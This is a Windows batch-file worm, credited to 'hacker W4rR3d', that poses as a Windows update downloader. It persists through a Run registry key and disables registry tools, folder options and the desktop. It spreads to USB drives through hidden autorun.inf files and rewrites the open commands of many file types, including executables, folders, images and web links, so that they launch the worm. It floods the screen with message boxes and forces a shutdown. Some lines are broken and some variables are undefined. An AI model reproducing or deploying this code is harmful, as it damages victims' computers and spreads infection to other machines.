::worm Windows_updates_downloader2.5.bat
::by hacker W4rR3d
::Comunidad hacker "Black Eye Security Team" Piura -Peru
:per
if exist "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat"
( goto dn
) else goto :
NN :NN
:Encryptions
%ts% f=f
%ts% r=r
:registro protection
TASKKILL /IM explorer.exe /F
TASKKILL /IM msnmsgr.exe /F
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v updates /t REG_SZ /d "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://windows-updates-downloader.softonic.com/descargar"
reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
:agregarse en dispositivos
%f%o
%r% %%p in (b e f g h i j k l m n o p q r s t u v w x y z
) do if exist %%p:
%0 goto LOG
%f%o
%r% %%i In (b e f g h i j k l m n o p q r s t u v w x y z
) do type
%0 > %%i:
%vsb% [autorun] >> %%i:\autorun.inf
%vsb% open=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf
%vsb% shellexecute=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf
%vsb% Icon=%windir%\system32\Shell32.dll,4 >> %%i:\autorun.inf
%vsb% Shell\Open\COMMAND=Windows_updates_downloader2.5.bat
%vsb% Shell\Explore\command=Windows_updates_downloader2.5.bat
%vsb% UseAutoPlay=1
attrib +h +s +r %%i:\autorun.inf
:extenderse
md C:\c5734b2b09076e4acebc92bb8c25
%ph% %0 C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat
attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat
attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25
%vsb% On Error Resume Next >> C:\terror.vbs
%vsb% Set Ws = CreateObject
("WScript.Shell"
) >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\bmpfile\shell\open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HkEY_CLASSES_ROOT\Folder\Shell\Explore\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\Folder\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\exefile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\htmlfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\HTTP\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\https\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inffile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inifile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mp3file\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\txtfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\wmafile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
start C:\terror.vbs
:back
%ph% %0 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Usub.exe
%ph% %0 %SYSTEMROOT%\SYSTEM32\Usub.exe
%ph% %0 %SYSTEMDRIVE%\Usub.exe
%ph% %0 %userprofile%\Usub.exe
%ph% %0 %programfiles%\Usub.exe
%ph% %0 C:\RECYCLER\Usub.bmp
:mensaje
%vsb% On Error Resume Next >> C:\ipnuker.vbs
%vsb% Msgbox "Computer is infected with a virus.",16,"hacked by W4rR3d" >> C:\ipnuker.vbs
For /L
%%a IN (0,1,1000
) DO start start C:\ipnuker.vbs
:LOG
%vsb% ::USuB Log:: >> USuB_Log.log
%vsb% Directory *c5734b2b09076e4acebc92bb8c25* >> Usub_Log.log
%vsb% USB's
in drive A-Z excluding C, D, and E, Installed
>> Usub_Log.log
%ph% USuB_Log.log C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log
attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log
del %curdir% Usub_Log.log
:dn
%vsb% On Error Resume Next >> C:\apagar.vbs
%vsb% set shell = CreateObject
("WScript.Shell"
) >> C:\apagar.vbs
%vsb% shell.run "shutdown.exe -s -f -t 8 " >> C:\apagar.vbs
start C:\apagar.vbs
:Memory Loop